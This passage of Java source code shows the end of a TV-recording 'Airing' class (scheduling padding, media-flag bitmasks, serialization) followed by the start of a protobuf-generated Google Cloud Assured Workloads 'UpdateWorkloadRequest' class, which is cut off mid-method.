bond.stopPad; } private long getAdjustedSchedulingEnd(Agent bond) { Airing nextAir = Wizard.getInstance().getTimeRelativeAiring(this, 1); ManualRecord nextMR = null; if (nextAir != this && Carny.getInstance().isLoveAir(nextAir)) { if ((nextMR = Wizard.getInstance().getManualRecord(nextAir)) != null) { if (time + duration + bond.stopPad <= nextMR.getStartTime()) { return time + duration + bond.stopPad; } else { return Math.min(time + duration + bond.stopPad, Math.max(time + duration, nextMR.getStartTime())); } } else if (!nextAir.isWatchedForSchedulingPurpose()) { Agent nextBond = Carny.getInstance().getCauseAgent(nextAir); if (nextBond != null) { // See if there's actually a conflict here that needs to be removed, don't remove padding if // we don't have to if (time + duration + bond.stopPad <= nextAir.time - nextBond.startPad) { return time + duration + bond.stopPad; } else { return Math.min(time + duration + bond.stopPad, Math.max(time + duration, nextAir.time - nextBond.startPad)); } } } } return time + duration + bond.stopPad; } @Override boolean validate() { getShow(); if (myShow == null) return false; // Be sure all the objects below us have our mask applied to them if (getMediaMask() != 0 && Wizard.GENERATE_MEDIA_MASK) myShow.addMediaMaskRecursive(getMediaMask()); return true; } public Show getShow() { return (myShow != null) ? myShow : (myShow = Wizard.getInstance().getShowForID(showID)); } public int getShowID() { return showID; } public long getTTA() { return Math.max(0, time - Sage.time()); } public Channel getChannel() { return Wizard.getInstance().getChannelForStationID(stationID); } public String getChannelName() { Channel c = getChannel(); return (c == null) ? "" : c.name; } public boolean doesOverlap(Airing testMe) { return ((testMe.getEndTime() > time) && (testMe.time < getEndTime())); } public boolean doesOverlap(long startTime, long endTime) { return (endTime > time) && (startTime < getEndTime()); } public boolean doesSchedulingOverlap(Airing testMe) { return ((testMe.getSchedulingEnd() > getSchedulingStart()) && (testMe.getSchedulingStart() < getSchedulingEnd())); } public boolean doesSchedulingOverlap(long startTime, long endTime) { return (endTime > getSchedulingStart()) && (startTime < getSchedulingEnd()); } public boolean isWatched() { return BigBrother.isWatched(this); } public boolean isWatchedForSchedulingPurpose() { return BigBrother.isWatched(this, true); } public boolean isViewable() { return EPG.getInstance().canViewStation(stationID); } public Airing[] getNextWatchableAirings(long afterTime) { afterTime = Math.min(afterTime, time); Show myShow = getShow(); if (myShow == null) return Pooler.EMPTY_AIRING_ARRAY; Airing[] showAirs = Wizard.getInstance().getAirings(myShow, afterTime); List<Airing> rv = new ArrayList<Airing>(); for (int i = 0; i < showAirs.length; i++) { if (showAirs[i].isTV() && showAirs[i].isViewable()) rv.add(showAirs[i]); } return rv.toArray(Pooler.EMPTY_AIRING_ARRAY); } public boolean hasLaterWatchableAiring() { Show myShow = getShow(); if (myShow == null) return false; Airing[] showAirs = Wizard.getInstance().getAirings(myShow, getEndTime()); for (int i = 0; i < showAirs.length; i++) { if (showAirs[i].isTV() && showAirs[i].isViewable()) return true; } return false; } public boolean isMustSee() { return Profiler.isMustSee(this); } public boolean isDontLike() { Show myShow = getShow(); if (myShow != null && myShow.isDontLike()) return true; Wasted w = Wizard.getInstance().getWastedForAiring(id); return (w != null) && w.isManual(); } @Override void update(DBObject fromMe) { Airing a = (Airing) fromMe; if (showID != a.showID) myShow = null; showID = a.showID; time = a.time; duration = a.duration; partsB = a.partsB; miscB = a.miscB; prB = a.prB; stationID = a.stationID; persist = a.persist; super.update(fromMe); } Airing(int inID) { super(inID); } Airing(DataInput in, byte ver, Map<Integer, Integer> idMap) throws IOException { super(in, ver, idMap); showID = readID(in, idMap); stationID = in.readInt(); time = in.readLong(); duration = in.readLong(); if (duration < 0) { Wizard.INVALID_AIRING_DURATIONS = true; if (Sage.DBG) System.out.println("BAD AIRING DURATION: id=" + id + " showID=" + showID + " time=" + time + " duration=" + duration + " mask=" + getMediaMaskString()); } partsB = in.readByte(); if (ver >= 0x4A) miscB = in.readInt(); else miscB = in.readByte() & 0xFF; prB = in.readByte(); if (ver >= 0x41) persist = in.readByte(); if (ver >= 0x4C && ver < 0x54) { int size = in.readShort(); in.skipBytes(size); // url bytes long foo = (ver >= 0x51) ? in.readLong() : in.readInt(); if (foo != 0) { in.readShort(); // price in.readInt(); // flags in.readInt(); // winstart if (ver >= 0x4E) { size = in.readShort(); in.skipBytes(size); // provider } } } } @Override void write(DataOutput out, int flags) throws IOException { super.write(out, flags); out.writeInt(showID); out.writeInt(stationID); out.writeLong(time); out.writeLong(duration); out.writeByte(partsB); out.writeInt(miscB); out.writeByte(prB); out.writeByte(persist); } @Override public Object clone() { Airing rv = (Airing) super.clone(); return rv; } public String getTitle() { if (getShow() == null) return Sage.rez("Invalid_Airing"); else return getShow().getTitle(); } // For music files public int getTrack() { return partsB & 0xFF; } // For picture files public int getOrientation() { return partsB & 0xFF; } @Override public String toString() { if (getShow() == null) return "BAD AIRING"; StringBuilder sb = new StringBuilder("A["); sb.append(id); sb.append(','); sb.append(showID); sb.append(",\""); sb.append(getShow().getTitle()); sb.append("\","); sb.append(stationID); sb.append('@'); sb.append(Sage.dfLittle(time)); sb.append(','); sb.append(duration/60000L); sb.append(','); sb.append(getMediaMaskString().trim()); sb.append(']'); return sb.toString(); } public boolean isHDTV() { return ((miscB & HDTV_MASK) == HDTV_MASK); } public boolean isCC() { return ((miscB & CC_MASK) == CC_MASK); } public boolean isStereo() { return ((miscB & STEREO_MASK) == STEREO_MASK); } public boolean isSubtitled() { return ((miscB & SUBTITLE_MASK) == SUBTITLE_MASK); } public boolean isSAP() { return ((miscB & SAP_MASK) == SAP_MASK); } public boolean isPremiere() { return ((miscB & PREMIERES_BITMASK) == PREMIERE_MASK); } public boolean isSeasonPremiere() { return ((miscB & PREMIERES_BITMASK) == SEASON_PREMIERE_MASK); } public boolean isSeriesPremiere() { return ((miscB & PREMIERES_BITMASK) == SERIES_PREMIERE_MASK); } public boolean isChannelPremiere() { return ((miscB & PREMIERES_BITMASK) == CHANNEL_PREMIERE_MASK); } public boolean isSeasonFinale() { return ((miscB & PREMIERES_BITMASK) == SEASON_FINALE_MASK); } public boolean isSeriesFinale() { return ((miscB & PREMIERES_BITMASK) == SERIES_FINALE_MASK); } public boolean is3D() { return ((miscB & THREED_MASK) == THREED_MASK); } public boolean isDD51() { return ((miscB & DD51_MASK) == DD51_MASK); } public boolean isDolby() { return ((miscB & DOLBY_MASK) == DOLBY_MASK); } public boolean isLetterbox() { return ((miscB & LETTERBOX_MASK) == LETTERBOX_MASK); } public boolean isLive() { return ((miscB & LIVE_MASK) == LIVE_MASK); } public boolean isNew() { return ((miscB & NEW_MASK) == NEW_MASK); } public boolean isWidescreen() { return ((miscB & WIDESCREEN_MASK) == WIDESCREEN_MASK); } public boolean isSurround() { return ((miscB & SURROUND_MASK) == SURROUND_MASK); } public boolean isDubbed() { return ((miscB & DUBBED_MASK) == DUBBED_MASK); } public boolean isTaped() { return ((miscB & TAPE_MASK) == TAPE_MASK); } public int getTotalParts() { return partsB & 0x0F; } public int getPartNum() { return (partsB >> 4) & 0x0F; } public void appendMiscInfo(StringBuilder sb) { boolean addComma = false; if ((partsB & 0x0F) > 1) { sb.append(Sage.rez("Part_Of_Parts", new Object[] { new Integer((partsB >> 4) & 0x0F), new Integer(partsB & 0x0F) })); addComma = true; } if (isCC()) { if (addComma) sb.append(", "); sb.append(Sage.rez("Closed_Captioned")); addComma = true; } if (isStereo()) { if (addComma) sb.append(", "); sb.append(Sage.rez("Stereo")); addComma = true; } if (isHDTV()) { if (addComma) sb.append(", "); sb.append(Sage.rez("HDTV")); addComma = true; } if (isSubtitled()) { if (addComma) sb.append(", "); sb.append(Sage.rez("Subtitled")); addComma = true; } if ((miscB & PREMIERES_BITMASK) == PREMIERE_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Premiere")); addComma = true; } if ((miscB & PREMIERES_BITMASK) == SEASON_PREMIERE_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Season_Premiere")); addComma = true; } if ((miscB & PREMIERES_BITMASK) == SERIES_PREMIERE_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Series_Premiere")); addComma = true; } if ((miscB & PREMIERES_BITMASK) == CHANNEL_PREMIERE_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Channel_Premiere")); addComma = true; } if ((miscB & PREMIERES_BITMASK) == SEASON_FINALE_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Season_Finale")); addComma = true; } if ((miscB & PREMIERES_BITMASK) == SERIES_FINALE_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Series_Finale")); addComma = true; } if ((miscB & SAP_MASK) == SAP_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("SAP")); addComma = true; } if ((miscB & THREED_MASK) == THREED_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("3D")); addComma = true; } if ((miscB & DD51_MASK) == DD51_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("DD5.1")); addComma = true; } else if ((miscB & DOLBY_MASK) == DOLBY_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Dolby")); addComma = true; } if ((miscB & LETTERBOX_MASK) == LETTERBOX_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Letterbox")); addComma = true; } if ((miscB & LIVE_MASK) == LIVE_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Live")); addComma = true; } if ((miscB & WIDESCREEN_MASK) == WIDESCREEN_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Widescreen")); addComma = true; } if ((miscB & SURROUND_MASK) == SURROUND_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Surround")); addComma = true; } if ((miscB & DUBBED_MASK) == DUBBED_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Dubbed")); addComma = true; } if ((miscB & TAPE_MASK) == TAPE_MASK) { if (addComma) sb.append(", "); sb.append(Sage.rez("Taped")); addComma = true; } } public String getMiscInfo() { StringBuilder sb = new StringBuilder(); appendMiscInfo(sb); return sb.toString(); } public static byte getMiscBMaskForSearch(String str, boolean caseSensitive, boolean fullMatch) { return getMiscBMaskForSearch(null, str, caseSensitive, fullMatch); } public static byte getMiscBMaskForSearch(Pattern pat) { return getMiscBMaskForSearch(pat, null, false, false); } private static byte getMiscBMaskForSearch(Pattern pat, String str, boolean caseSensitive, boolean fullMatch) { int rv = 0; if (pat == null && (str == null || str.length() == 0)) return 0; if (pat == null && !caseSensitive) str = str.toLowerCase(); String test = Sage.rez("Closed_Captioned"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | CC_MASK; test = Sage.rez("Stereo"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | STEREO_MASK; test = Sage.rez("HDTV"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | HDTV_MASK; test = Sage.rez("Subtitled"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | SUBTITLE_MASK; test = Sage.rez("SAP"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | SAP_MASK; test = Sage.rez("3D"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | THREED_MASK; test = Sage.rez("Dolby Digital 5.1"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | DD51_MASK; test = Sage.rez("Dolby"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | DOLBY_MASK; test = Sage.rez("Letterbox"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | LETTERBOX_MASK; test = Sage.rez("Live"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | LIVE_MASK; test = Sage.rez("New"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | NEW_MASK; test = Sage.rez("Widescreen"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | WIDESCREEN_MASK; test = Sage.rez("Surround"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | SURROUND_MASK; test = Sage.rez("Dubbed"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | DUBBED_MASK; test = Sage.rez("Taped"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv = rv | TAPE_MASK; return (byte)(rv & 0xFF); } static byte getMiscBMaskForSearchNTE(String nteString) { int rv = 0; if (nteString == null || nteString.length() == 0) return 0; if (StringMatchUtils.wordMatchesNte("Closed_Captioned", nteString)) rv = rv | CC_MASK; if (StringMatchUtils.wordMatchesNte("Stereo", nteString)) rv = rv | STEREO_MASK; if (StringMatchUtils.wordMatchesNte("HDTV", nteString)) rv = rv | HDTV_MASK; if (StringMatchUtils.wordMatchesNte("Subtitled", nteString)) rv = rv | SUBTITLE_MASK; if (StringMatchUtils.wordMatchesNte("SAP", nteString)) rv = rv | SAP_MASK; if (StringMatchUtils.wordMatchesNte("3D", nteString)) rv = rv | THREED_MASK; if (StringMatchUtils.wordMatchesNte("Dolby Digital 5.1", nteString)) rv = rv | DD51_MASK; if (StringMatchUtils.wordMatchesNte("Dolby", nteString)) rv = rv | DOLBY_MASK; if (StringMatchUtils.wordMatchesNte("Letterbox", nteString)) rv = rv | LETTERBOX_MASK; if (StringMatchUtils.wordMatchesNte("Live", nteString)) rv = rv | LIVE_MASK; if (StringMatchUtils.wordMatchesNte("New", nteString)) rv = rv | NEW_MASK; if (StringMatchUtils.wordMatchesNte("Widescreen", nteString)) rv = rv | WIDESCREEN_MASK; if (StringMatchUtils.wordMatchesNte("Surround", nteString)) rv = rv | SURROUND_MASK; if (StringMatchUtils.wordMatchesNte("Dubbed", nteString)) rv = rv | DUBBED_MASK; if (StringMatchUtils.wordMatchesNte("Taped", nteString)) rv = rv | TAPE_MASK; return (byte)(rv & 0xFF); } public static byte[] getPremiereBValuesForSearch(String str, boolean caseSensitive, boolean fullMatch) { return getPremiereBValuesForSearch(null, str, caseSensitive, fullMatch); } public static byte[] getPremiereBValuesForSearch(Pattern pat) { return getPremiereBValuesForSearch(pat, null, false, false); } private static byte[] getPremiereBValuesForSearch(Pattern pat, String str, boolean caseSensitive, boolean fullMatch) { if (pat == null && (str == null || str.length() == 0)) return new byte[0]; List<Byte> rv = new ArrayList<Byte>(); if (pat == null && !caseSensitive) str = str.toLowerCase(); String test = Sage.rez("Premiere"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv.add((byte) PREMIERE_MASK); test = Sage.rez("Season_Premiere"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv.add((byte) SEASON_PREMIERE_MASK); test = Sage.rez("Series_Premiere"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv.add((byte) SERIES_PREMIERE_MASK); test = Sage.rez("Channel_Premiere"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv.add((byte) CHANNEL_PREMIERE_MASK); test = Sage.rez("Season_Finale"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv.add((byte) SEASON_FINALE_MASK); test = Sage.rez("Series_Finale"); if (pat == null && !caseSensitive) test = test.toLowerCase(); if ((pat != null && pat.matcher(test).matches()) || (str != null && ((fullMatch && test.equals(str)) || (!fullMatch && test.indexOf(str) != -1)))) rv.add((byte) SERIES_FINALE_MASK); if (rv.isEmpty()) return new byte[0]; byte[] rb = new byte[rv.size()]; for (int i = 0; i < rb.length; i++) rb[i] = rv.get(i); return rb; } static byte[] getPremiereBValuesForSearchNTE(String nteString) { if (nteString == null || nteString.length() == 0) return new byte[0]; List<Byte> rv = new ArrayList<Byte>(); if ( StringMatchUtils.wordMatchesNte("Premiere", nteString)) rv.add((byte) PREMIERE_MASK); if ( StringMatchUtils.wordMatchesNte("Season_Premiere", nteString)) rv.add((byte) SEASON_PREMIERE_MASK); if ( StringMatchUtils.wordMatchesNte("Series_Premiere", nteString)) rv.add((byte) SERIES_PREMIERE_MASK); if ( StringMatchUtils.wordMatchesNte("Channel_Premiere", nteString)) rv.add((byte) CHANNEL_PREMIERE_MASK); if ( StringMatchUtils.wordMatchesNte("Season_Finale", nteString)) rv.add((byte) SEASON_FINALE_MASK); if ( StringMatchUtils.wordMatchesNte("Series_Finale", nteString)) rv.add((byte) SERIES_FINALE_MASK); if (rv.isEmpty()) return new byte[0]; byte[] rb = new byte[rv.size()]; for (int i = 0; i < rb.length; i++) rb[i] = rv.get(i); return rb; } public String[] getRatingRestrictables() { List<String> v = new ArrayList<String>(); if (prB > 0) v.add(PR_NAMES[prB]); Show s = getShow(); if (s != null) { if (s.rated != null) v.add(s.rated.name); for (int i = 0; i < s.ers.length; i++) v.add(s.ers[i].name); } if (v.isEmpty()) v.add("Unrated"); if (stationID != 0) v.add(Integer.toString(stationID)); return v.toArray(Pooler.EMPTY_STRING_ARRAY); } public String getParentalRating() { return (prB > 0) ? PR_NAMES[prB] : ""; } void setPersist(byte how) { if (persist != how) { persist = how; Wizard.getInstance().logUpdate(this, Wizard.AIRING_CODE); } } int showID; int stationID; long time; long duration; byte partsB; int miscB; byte prB; byte persist; private transient Show myShow; public static final int CC_MASK = 0x01; public static final int STEREO_MASK = 0x02; public static final int HDTV_MASK = 0x04; public static final int SUBTITLE_MASK = 0x08; public static final int PREMIERES_BITMASK = 0x70; public static final int PREMIERE_MASK = 0x10; public static final int SEASON_PREMIERE_MASK = 0x20; public static final int SERIES_PREMIERE_MASK = 0x30; public static final int CHANNEL_PREMIERE_MASK = 0x40; public static final int SEASON_FINALE_MASK = 0x50; public static final int SERIES_FINALE_MASK = 0x60; public static final int SAP_MASK = 0x80; // For extended misc data public static final int THREED_MASK = 0x100; public static final int DD51_MASK = 0x200; public static final int DOLBY_MASK = 0x400; public static final int LETTERBOX_MASK = 0x800; public static final int LIVE_MASK = 0x1000; public static final int NEW_MASK = 0x2000; public static final int WIDESCREEN_MASK = 0x4000; public static final int SURROUND_MASK = 0x8000; public static final int DUBBED_MASK = 0x10000; public static final int TAPE_MASK = 0x20000; public static final byte PERSIST_TV_MEDIAFILE_LINK = 0x1; public static final byte TVY_VALUE = 1; public static final byte TVY7_VALUE = 2; public static final byte TVG_VALUE = 3; public static final byte TVPG_VALUE = 4; public static final byte TV14_VALUE = 5; public static final byte TVMA_VALUE = 6; public static final String[] PR_NAMES = { "", Sage.rez("TVY"), Sage.rez("TVY7"), Sage.rez("TVG"), Sage.rez("TVPG"), Sage.rez("TV14"), Sage.rez("TVM") }; public static final Comparator<Airing> SHOW_ID_COMPARATOR = new Comparator<Airing>() { public int compare(Airing a1, Airing a2) { if (a1 == a2) return 0; else if (a1 == null) return 1; else if (a2 == null) return -1; return (a1.showID == a2.showID) ? Long.signum(a1.time - a2.time) : a1.showID - a2.showID; } }; /** * If start times are the same, sort by station ID. If the start times are different, sort by * start time. Sorting is low to high. */ public static final Comparator<Airing> TIME_CHANNEL_COMPARATOR = new Comparator<Airing>() { public int compare(Airing a1, Airing a2) { if (a1 == a2) return 0; else if (a1 == null) return 1; else if (a2 == null) return -1; return (a1.time == a2.time) ? a1.stationID - a2.stationID : Long.signum(a1.time - a2.time); } }; /** * If station ID's are the same, the sort by start time. If station ID's are different, sort by * station ID. Sorting is low to high. */ public static final Comparator<Airing> CHANNEL_TIME_COMPARATOR = new Comparator<Airing>() { public int compare(Airing a1, Airing a2) { if (a1 == a2) return 0; else if (a1 == null) return 1; else if (a2 == null) return -1; return (a1.stationID == a2.stationID) ? Long.signum(a1.time - a2.time) : a1.stationID - a2.stationID; } }; }
googleapis/google-cloud-java
35,810
java-assured-workloads/proto-google-cloud-assured-workloads-v1beta1/src/main/java/com/google/cloud/assuredworkloads/v1beta1/UpdateWorkloadRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/assuredworkloads/v1beta1/assuredworkloads.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.assuredworkloads.v1beta1; /** * * * <pre> * Request for Updating a workload. * </pre> * * Protobuf type {@code google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest} */ public final class UpdateWorkloadRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest) UpdateWorkloadRequestOrBuilder { private static final long serialVersionUID = 0L; // Use UpdateWorkloadRequest.newBuilder() to construct. private UpdateWorkloadRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private UpdateWorkloadRequest() {} @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new UpdateWorkloadRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.assuredworkloads.v1beta1.AssuredworkloadsProto .internal_static_google_cloud_assuredworkloads_v1beta1_UpdateWorkloadRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.assuredworkloads.v1beta1.AssuredworkloadsProto .internal_static_google_cloud_assuredworkloads_v1beta1_UpdateWorkloadRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest.class, com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest.Builder.class); } private int bitField0_; public static final int WORKLOAD_FIELD_NUMBER = 1; private com.google.cloud.assuredworkloads.v1beta1.Workload workload_; /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the workload field is set. */ @java.lang.Override public boolean hasWorkload() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The workload. */ @java.lang.Override public com.google.cloud.assuredworkloads.v1beta1.Workload getWorkload() { return workload_ == null ? com.google.cloud.assuredworkloads.v1beta1.Workload.getDefaultInstance() : workload_; } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public com.google.cloud.assuredworkloads.v1beta1.WorkloadOrBuilder getWorkloadOrBuilder() { return workload_ == null ? com.google.cloud.assuredworkloads.v1beta1.Workload.getDefaultInstance() : workload_; } public static final int UPDATE_MASK_FIELD_NUMBER = 2; private com.google.protobuf.FieldMask updateMask_; /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(1, getWorkload()); } if (((bitField0_ & 0x00000002) != 0)) { output.writeMessage(2, getUpdateMask()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, getWorkload()); } if (((bitField0_ & 0x00000002) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(2, getUpdateMask()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest)) { return super.equals(obj); } com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest other = (com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest) obj; if (hasWorkload() != other.hasWorkload()) return false; if (hasWorkload()) { if (!getWorkload().equals(other.getWorkload())) return false; } if (hasUpdateMask() != other.hasUpdateMask()) return false; if (hasUpdateMask()) { if (!getUpdateMask().equals(other.getUpdateMask())) return false; } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasWorkload()) { hash = (37 * hash) + WORKLOAD_FIELD_NUMBER; hash = (53 * hash) + getWorkload().hashCode(); } if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest parseFrom( byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static 